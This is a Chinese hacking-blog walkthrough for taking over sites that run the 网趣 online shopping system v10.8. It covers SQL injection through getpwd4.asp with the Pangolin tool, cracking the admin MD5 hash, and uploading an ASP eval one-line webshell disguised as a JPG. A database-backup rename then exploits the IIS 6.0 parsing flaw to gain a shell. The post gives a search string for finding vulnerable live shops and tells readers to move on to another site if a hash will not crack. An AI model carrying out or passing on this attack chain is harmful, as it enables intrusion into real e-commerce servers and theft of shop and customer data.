危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2289 浏览18982303

又见网趣网上购物系统的注入漏洞

某天晚上危险漫步在网上转悠,发现网趣网上购物系统又一一又一一又出注入漏洞了。作为一款网上购物系统能接二连三的出现漏洞还真是让人不可思议。网趣网上购物系统出漏洞的速度好像比当年万洞之王的动网还动网。。。

网趣网上购物系统版本更新很快,随着新版本的发布新的漏洞也被人发现并公布。截至危险漫步写这篇文章的时候,网趣网上购物系统的最新版本为网趣时尚版V10.8版,别人公布的漏洞说是网趣时尚版V10.7版的,我没有找到网趣时尚版V10.7版的源代码,下载最新版的网趣网上购物系统时尚版v10.8版的源代码后发现漏洞依然存在,所以漏洞也影响最新版本的网趣网上购物系统。今天就拿最新的网趣网上购物系统时尚版v10.8版来给大家介绍这个漏洞。

一、漏洞简单分析

这个漏洞的发布者是100(好奇怪的名字,哈哈)。出现漏洞的文件是网站根目录下的getpwd4.

在获得username变量的值后没有经过过滤就带入了SQL查询,包含的文件中也没有过滤,导致注入漏洞产生。

一、漏洞利用

看过了简单的漏洞分析,下面重点来看漏洞的利用,因为大多数叉子感兴趣的是怎样利用这个漏洞获得webshell。为了演示漏洞的利用过程,我从网上下载了存在漏洞的网趣网上购物系统时尚版v10.8版的源代码,在我的虚拟机里的Windows 2003系统中用IIS 6.O把网趣网上购物系统时尚版v10.8版运行了起来。

来看漏洞利用方法。漏洞公布者100给出了一个注入地址:getpwd4.asp?username=cnhww,我们虚拟机里的完整注入地址,其中cnhww是网趣网上购物系统自带的用户,如果不存在了可以自己注册个。把注入地址放到pangolin里,检测出了漏洞,并且是字符型注入漏洞。

网趣网上购物系统数据库里的表名为cnhww,不在pangolin的表名列表中,因此需要手动添加,点“Datas”选项卡,在左侧的空白框中右键-->AddTable,添加表cnhww。

然后双击表cnhww猜列名,管理员的用户名的列名为admin,管理员的密码的列名password,点”Datas”按钮后就可以得到想要的信息了。

得到的管理员的用户名为admin,密码为7a57a5a743894aOe,密码是经过MD5加密的,能不能破解出来就看你的运气了。在在线破解网站http://www.cmd5.com/破解出密码为admin。有了管理员的用户名和密码就可以考虑进后台拿shell了。当然,如果密码比较复杂,你破解不出来,最好的方法就是放弃这个网站换另一个网站试试了。

网趣网上购物系统的默认后台目录为admin,访问就看到了后台登录页面,用得到的管理员的用户名和密码登录了后台。

网趣网上购物系统在后台不存在上传漏洞,不能通过上传漏洞直接获得shell,后台有数据库备份的地方,但不能自定义备份后数据库的名字,因此也不能用常规的备份数据库文件的方法获得shell。那怎样才能获得shell呢?其实网趣网上购物系统后台获得shell说简单也简单,说困难(也可以说是不能)也困难,关键要看网趣网上购物系统所在服务器的WEB服务器用的是不是IIS 6.0了,如果是就简单,不是就麻烦了。好在现在网络上运行ASP程序

的WEB服务器绝大多数都是IIS 6.O,我虚拟机里的也是IIS 6.0,正好可以做演示。把ASP-句话木马服务端代码<%eval request("x")%>保存到一个文本文档里,然后把文件名改为x.jpg。在网趣网上购物系统后台中点击“商品管理”中的“添加商品”,然后点击“上传小图片”把刚才生成的x.Jpg上传上去,虽然提示文件格式不对,但却上传成功了,上传上去后的文件为up file/proimage/201151223154320996.jpg。

再点“数据处理”下的“数据备份”来到数据库备份的地方。可以看到备份数据库名称不能自定义,都为shop.mdb,但当前数据库路径和备份数据库目录都可以自定义。当前数据库路径写,../upfile/proimage/201151223154320996.jpg,也就是一句话木马服务端上传后的文件名,备份数据库目录写,./Databackup.asp。

点“开始备份”按钮后提示“数据库备份完成,请进行其他操作!”,说明备份成功了。备份后文件的访问地址,用lake2的eval最小马发送端连接(密码x),成功获得shell。利用的是IIS 6.0的解析漏洞。

通过搜索“顾客您好,购买商品请先登录”等可以找到可能存在这个漏洞的网站。由于购物网站的敏感性,叉子们在练手拿shell的时候千万不要搞破坏,这样对大家都好。

由于网趣网上购物系统版本更新比较快,怕想本机测试的朋友到时候找不到存在漏洞的网趣网上购物系统的源代码,网趣网上购物系统时尚版v10.8.rar。

最后再哕嗦几句,网趣网上购物系统作为一款网上购物系统,是直接关系到用户的财产安全的,安全性是很重要的一个方面,试想如果连购物的安全都不能保证谁还敢在你的网站购物,但网趣网上购物系统却时不时地爆出一个漏洞,实在不应该啊,强烈建议网趣网上购物系统的编写者多注意一些程序的安全性。